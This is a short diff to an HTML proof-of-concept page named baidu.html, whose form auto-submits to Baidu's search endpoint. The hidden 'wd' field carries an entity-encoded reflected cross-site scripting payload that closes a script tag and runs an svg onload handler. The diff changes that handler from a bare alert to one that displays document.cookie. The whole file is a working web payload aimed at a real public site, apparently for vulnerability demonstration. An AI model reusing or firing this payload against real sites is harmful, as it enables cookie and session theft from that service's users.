--- a/baidu.html
+++ b/baidu.html
@@ -4,7 +4,7 @@
   <script>history.pushState('', '', '/')</script>
     <form action="https://www.baidu.com/s">
       <input type="hidden" name="mod" value="1" />
-      <input type="hidden" name="wd" value="&lt;&#47;script&gt;&lt;svg&#47;onload&#61;alert&#96;&#96;&gt;22" />
+      <input type="hidden" name="wd" value="&lt;&#47;script&gt;&lt;svg&#47;onload&#61;alert&#40;document&#46;cookie&#41;&gt;22" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
